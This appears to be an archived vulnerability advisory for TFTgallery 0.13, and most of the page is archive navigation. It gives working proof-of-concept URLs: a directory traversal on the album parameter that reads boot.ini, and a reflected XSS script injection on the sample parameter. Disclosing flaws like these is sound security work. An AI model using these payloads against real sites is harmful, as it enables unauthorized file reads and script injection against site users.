TFTgallery 0.13 Directory Traversal

TFTgallery 0.13 Directory Traversal: Posted Nov 3, 2009; Authored by Blake; TFTgallery version 0.13 is susceptible to a directory traversal vulnerability.; tags | exploit, file inclusion; SHA-256 | 5370fcca2282a413d7c5725544ed0dd09fef1ae46f8a2f1ae671c6f349ecee64; Download | Favorite | View

TFTgallery 0.13 Directory Traversal

Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:

The album parameter is vulnerable to directory transversal

http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1<http://192.168.1.130/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1>

The sample parameter is vulnerable to XSS

http://example.com/tftgallery/settings.php?sample='></link><script>alert('blake
XSS test')</script>&name=cucumber%20cool
<http://192.168.1.130/tftgallery/settings.php?sample=>

Top Authors In Last 30 Days

Red Hat 133 files
Ubuntu 103 files
Debian 16 files
LiquidWorm 10 files
Google Security Research 10 files
Abdulhakim Oner 8 files
Ivan Fratric 5 files
fearzzzz 5 files
nu11secur1ty 5 files
Jann Horn 4 files

File Archives

Systems

AIX (426)
Apple (1,951)
BSD (370)
CentOS (56)
Cisco (1,919)
Debian (6,712)
Fedora (1,691)
FreeBSD (1,242)
Gentoo (4,288)
HPUX (878)
iOS (338)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,108)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,912)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,439)
UNIX (9,207)
UnixWare (185)
Windows (6,531)
Other

TFTgallery 0.13 Directory Traversal

TFTgallery 0.13 Directory Traversal

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

TFTgallery 0.13 Directory Traversal

Share This

TFTgallery 0.13 Directory Traversal

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems